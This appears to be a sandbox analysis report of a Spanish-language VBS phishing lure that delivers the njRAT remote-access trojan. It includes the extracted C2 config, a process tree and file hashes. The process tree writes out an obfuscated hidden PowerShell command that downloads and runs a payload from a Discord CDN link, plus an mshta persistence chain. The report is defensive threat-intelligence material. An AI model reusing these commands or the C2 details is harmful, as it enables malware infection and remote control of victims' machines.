Overview

overview

10

Static

static

Requerimie...OA.vbs

windows7_x64

8

Requerimie...OA.vbs

windows10_x64

10

Analysis

  • max time kernel
    150s
  • max time network
    158s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    13-09-2021 15:55

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Requerimiento fiscal aqui encontrara copia de la denuncia presentada en su contra NUNC SPOA.vbs

  • Size

    826B

  • MD5

    676950cc6c5b064bd1a75cdc8cbf4438

  • SHA1

    7deabbeb895a1839b61b1f5a4ddbabbc5ca566b6

  • SHA256

    6786d7be736d7131db9aae8c1f51a2f2a86f506cebda18af9cbb8d54e51c7eb3

  • SHA512

    8a30e71961e19c033e9bb03f18f891ba4f40fb44d18f55539823f876ee38790ebd21591558e01838dc33f6f4fba405e888b5d14ce2c75104f0782e893d8f45f0

Score
10/10
njratnyan cattrojan

Malware Config

Extracted

Family

njrat

Version

0.7NC

Botnet

NYAN CAT

C2

yur2021.duckdns.org:2001

Mutex

0a30571c770d468e

Attributes
  • reg_key

    0a30571c770d468e

  • splitter

    @!#&^%$

Signatures

  • njRAT/Bladabindi

    Widely used RAT written in .NET.

    trojannjrat
  • Blocklisted process makes network request 1 IoCs
  • Drops startup file 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious use of AdjustPrivilegeToken 29 IoCs
  • Suspicious use of WriteProcessMemory 21 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Requerimiento fiscal aqui encontrara copia de la denuncia presentada en su contra NUNC SPOA.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3932
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -ExEcUtIoNPoLiCy ByPAsS -wInDoWStYlE hIdDEn -command Invoke-Expression(New-Object Net.WebClient).(-join [char[]](68,111,119,110,108,111,97,100,83,116,114,105,110,103)).Invoke('https://cdn.discordapp.com/attachments/878366592180813876/884445633640034374/jai06.txt');$results
      2⤵
      • Blocklisted process makes network request
      • Drops startup file
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3884
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Login1.VBS"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1788
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\SystemLogin.bat" "
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2256
          • C:\Windows\system32\mshta.exe
            mshta vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -ExecutionPolicy Bypass & 'C:\Users\Public\myScript.ps1'"", 0:close")
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:2504
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass & 'C:\Users\Public\myScript.ps1'
              6⤵
              • Suspicious use of SetThreadContext
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:3568
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                7⤵
                  PID:3116
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                  7⤵
                  • Suspicious use of AdjustPrivilegeToken
                  PID:420

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Initial Access

    Execution

    Persistence

    Privilege Escalation

    Defense Evasion

    Credential Access

    Discovery

    System Information Discovery

    1
    T1082

    Lateral Movement

    Collection

    Exfiltration

    Command and Control

    Impact

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Login1.VBS
      MD5

      558a8b7b3fdef4ca79110f8cfd126694

      SHA1

      d6e96ca27f701b3f4c24885dacd14c762a9d36b0

      SHA256

      38c9b7098371b39e61a6dcf78370dddf47f4d2be2c32704a2a0310b76c52c0f7

      SHA512

      37d6d72d5f518aaf1cf37154ed75aec7c7f11677508874eb3c3cbf44ca0ebeb22112dfa5f45a2f5d821604c521092ef768016d83f948444a9ff2e2a812d1c283

      Download Submit
    • C:\Users\Admin\AppData\Roaming\SystemLogin.bat
      MD5

      7f85382953fde20b101039d48673dbd2

      SHA1

      5ebaa67f5862b2925d9029f4761b7e2ce9a99dd9

      SHA256

      fde417ad1b13a97acfa8e409789a92c4c3ddf6303851337ca31b94bfac634e4f

      SHA512

      6e93b74237844e1f78cd3ae64c0a00702c0b1aa1febda2feb52ca99b8a58ab2efd0c7b8351f040bf56a8bc1a8f5b1f57c4a9ffed46f8a2f9cba898e8e138ce46

      Download Submit
    • C:\Users\Public\myScript.ps1
      MD5

      c948ef7f14f332e896a21b0fc2900495

      SHA1

      6b2215da5418fb744c22d516b5da8e31673da907

      SHA256

      10500d843e7d385ecab54acde0839b090afff19bdcd71a47cb57ca54317c3e05

      SHA512

      0998cf81acbd69c1aeee7c4a7c4c4b125c673734267a3390e91f3a02761565a34e712ba3fff1632bd4a193c9a45283e0c3fa5667e9fa5a0b0ba7ec373b85450a

      Download Submit
    • memory/420-236-0x0000000005B80000-0x0000000005B81000-memory.dmp
      Filesize

      4KB

      Download
    • memory/420-235-0x0000000005F60000-0x0000000005F61000-memory.dmp
      Filesize

      4KB

      Download
    • memory/420-234-0x0000000005950000-0x0000000005951000-memory.dmp
      Filesize

      4KB

      Download
    • memory/420-228-0x000000000040676E-mapping.dmp
      Download
    • memory/420-227-0x0000000000400000-0x000000000040C000-memory.dmp
      Filesize

      48KB

      Download
    • memory/420-237-0x00000000058B0000-0x000000000594C000-memory.dmp
      Filesize

      624KB

      Download
    • memory/420-238-0x0000000005B00000-0x0000000005B01000-memory.dmp
      Filesize

      4KB

      Download
    • memory/1788-185-0x0000000000000000-mapping.dmp
      Download
    • memory/2256-190-0x0000000000000000-mapping.dmp
      Download
    • memory/2504-191-0x0000000000000000-mapping.dmp
      Download
    • memory/3568-206-0x0000019DB7F10000-0x0000019DB7F12000-memory.dmp
      Filesize

      8KB

      Download
    • memory/3568-223-0x0000019DB7F00000-0x0000019DB7F03000-memory.dmp
      Filesize

      12KB

      Download
    • memory/3568-207-0x0000019DB7F13000-0x0000019DB7F15000-memory.dmp
      Filesize

      8KB

      Download
    • memory/3568-194-0x0000000000000000-mapping.dmp
      Download
    • memory/3568-214-0x0000019DB7EB0000-0x0000019DB7EB2000-memory.dmp
      Filesize

      8KB

      Download
    • memory/3568-221-0x0000019DB7ED0000-0x0000019DB7ED5000-memory.dmp
      Filesize

      20KB

      Download
    • memory/3568-222-0x0000019DB7F16000-0x0000019DB7F18000-memory.dmp
      Filesize

      8KB

      Download
    • memory/3884-114-0x0000000000000000-mapping.dmp
      Download
    • memory/3884-160-0x000001C4C0260000-0x000001C4C0262000-memory.dmp
      Filesize

      8KB

      Download
    • memory/3884-159-0x000001C4C0346000-0x000001C4C0348000-memory.dmp
      Filesize

      8KB

      Download
    • memory/3884-154-0x000001C4C25A0000-0x000001C4C25A1000-memory.dmp
      Filesize

      4KB

      Download
    • memory/3884-143-0x000001C4C0290000-0x000001C4C0291000-memory.dmp
      Filesize

      4KB

      Download
    • memory/3884-124-0x000001C4C0343000-0x000001C4C0345000-memory.dmp
      Filesize

      8KB

      Download
    • memory/3884-123-0x000001C4C0340000-0x000001C4C0342000-memory.dmp
      Filesize

      8KB

      Download
    • memory/3884-120-0x000001C4A8200000-0x000001C4A8201000-memory.dmp
      Filesize

      4KB

      Download